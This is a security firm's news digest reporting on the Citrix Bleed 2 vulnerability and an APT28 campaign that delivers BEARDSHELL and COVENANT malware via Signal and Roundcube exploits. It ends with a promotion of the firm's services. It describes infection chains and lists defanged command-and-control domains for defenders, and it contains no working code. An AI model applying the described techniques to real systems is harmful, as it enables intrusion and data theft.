Today’s Topics:

• Citrix Bleed 2: Over 1,200 Servers Vulnerable to Authentication Bypass Attack
• APT28’s New Malware Campaign: Signal Chat Delivers BEARDSHELL and COVENANT to Ukraine
• How can Netizen help?

Citrix Bleed 2: Over 1,200 Servers Vulnerable to Authentication Bypass Attack

On June 30, 2025, cybersecurity experts reported that more than 1,200 Citrix NetScaler ADC and NetScaler Gateway appliances exposed online remain unpatched against a critical vulnerability, CVE-2025-5777, which is believed to be actively exploited. This flaw, referred to as “Citrix Bleed 2,” allows threat actors to bypass authentication mechanisms and hijack user sessions by exploiting an out-of-bounds memory read vulnerability caused by insufficient input validation. Successful exploitation of this vulnerability could lead to attackers stealing session tokens, credentials, and other sensitive data from public-facing gateways and virtual servers, granting them access to restricted memory regions and enabling them to bypass multi-factor authentication (MFA).

Citrix previously experienced a similar issue, “CitrixBleed,” which was exploited in ransomware attacks in 2023, targeting government organizations and moving laterally across compromised networks. The newly discovered vulnerability, CVE-2025-5777, is of critical severity, and Citrix issued an advisory on June 17, 2025, urging customers to upgrade their appliances and terminate all active ICA and PCoIP sessions to block potential attacks.

Although Citrix has not yet confirmed public exploitation of CVE-2025-5777, security researchers from ReliaQuest assessed with medium confidence that the vulnerability is actively being exploited in targeted attacks. These attacks have shown indicators of post-exploitation activity, including hijacked Citrix web sessions, MFA bypass attempts, and suspicious LDAP queries linked to Active Directory reconnaissance. Additionally, security analysts from the Shadowserver Foundation discovered that over 2,100 Citrix NetScaler appliances were also unpatched against another critical vulnerability, CVE-2025-6543, which is currently being exploited in denial-of-service (DoS) attacks.

Both CVE-2025-5777 and CVE-2025-6543 are classified as critical severity vulnerabilities, prompting cybersecurity experts to advise administrators to immediately deploy the latest patches from Citrix to mitigate potential risks. Companies are also encouraged to review access controls and monitor their Citrix NetScaler appliances for unusual user sessions and activities to prevent further exploitation.

APT28’s New Malware Campaign: Signal Chat Delivers BEARDSHELL and COVENANT to Ukraine

The Computer Emergency Response Team of Ukraine (CERT-UA) has issued an alert about a new cyber attack campaign carried out by the Russian-linked APT28 (also known as UAC-0001) threat group. This campaign utilizes Signal chat messages to distribute two previously undetected malware families, BEARDSHELL and COVENANT, targeting Ukrainian entities.

According to CERT-UA, BEARDSHELL is a C++-based malware that allows threat actors to download and execute PowerShell scripts. The malware also enables the upload of results back to a remote server via the Icedrive API. The malware first appeared in March-April 2024 during incident response efforts on a Windows machine. At the time, the exact infection method was unknown, but recent intelligence from ESET linked the malware to a breach of a “gov.ua” email account, likely indicating government-targeted attacks.

Further investigation led to the discovery of the malware framework COVENANT, which operates as part of a multi-layered attack. In the campaign, APT28 is using Signal messages to send malicious macro-laden Microsoft Word documents. These documents, when opened, deploy two payloads: a malicious DLL (“ctec.dll”) and a PNG image (“windows.png”). The embedded macro also makes Windows Registry changes to ensure the DLL is loaded when Windows File Explorer is next launched. The primary function of the DLL is to execute shellcode embedded in the PNG, triggering the COVENANT framework to execute.

COVENANT subsequently downloads two additional payloads that facilitate the execution of the BEARDSHELL backdoor on compromised systems. The BEARDSHELL backdoor provides persistent access to the infected systems, allowing threat actors to maintain long-term control.

The malware is delivered via Signal chat, exploiting the Signal app’s ability to distribute files securely, making the attack harder to trace. For those defending against this threat, CERT-UA recommends monitoring network traffic associated with domains like “app.koofr[.]net” and “api.icedrive[.]net,” which are used for communication with the malware’s command-and-control servers.

In parallel to this malware campaign, APT28 has been targeting outdated versions of the Roundcube webmail software used in Ukrainian organizations. Exploiting vulnerabilities like CVE-2020-35730, CVE-2021-44026, and CVE-2020-12641, APT28 is delivering malicious JavaScript payloads through phishing emails. These emails disguise themselves as news articles but, once opened, exploit the vulnerabilities to execute arbitrary JavaScript, exfiltrate user data, and install further malware on the victim’s system.

One of the scripts, “e.js,” creates a mailbox rule to redirect incoming emails to a third-party address, while exfiltrating session cookies and the victim’s address book. The second, “q.js,” exploits an SQL injection vulnerability in Roundcube to extract information from the Roundcube database. A third file, “c.js,” exploits another vulnerability to execute arbitrary commands on the mail server.

These vulnerabilities were leveraged in phishing emails sent to over 40 Ukrainian organizations, highlighting the group’s persistence and evolving tactics. CERT-UA continues to monitor these activities and urges organizations to patch vulnerabilities, implement robust email security filters, and monitor network traffic for any signs of compromise.

To defend against these threats, CERT-UA advises organizations to:

• Ensure all systems are up to date with the latest patches.
• Disable macros in Microsoft Word and other Office applications.
• Monitor network traffic for unusual activity related to Icedrive and Koofr domains.
• Regularly audit email systems for signs of compromise, particularly for suspicious redirection or exfiltration activity.

How Can Netizen Help?

Netizen ensures that security gets built-in and not bolted-on. Providing advanced solutions to protect critical IT infrastructure such as the popular “CISO-as-a-Service” wherein companies can leverage the expertise of executive-level cybersecurity professionals without having to bear the cost of employing them full time. 

We also offer compliance support, vulnerability assessments, penetration testing, and more security-related services for businesses of any size and type. 

Additionally, Netizen offers an automated and affordable assessment tool that continuously scans systems, websites, applications, and networks to uncover issues. Vulnerability data is then securely analyzed and presented through an easy-to-interpret dashboard to yield actionable risk and compliance information for audiences ranging from IT professionals to executive managers.

Netizen is a CMMI V2.0 Level 3, ISO 9001:2015, and ISO 27001:2013 (Information Security Management) certified company. We are a proud Service-Disabled Veteran-Owned Small Business that is recognized by the U.S. Department of Labor for hiring and retention of military veterans.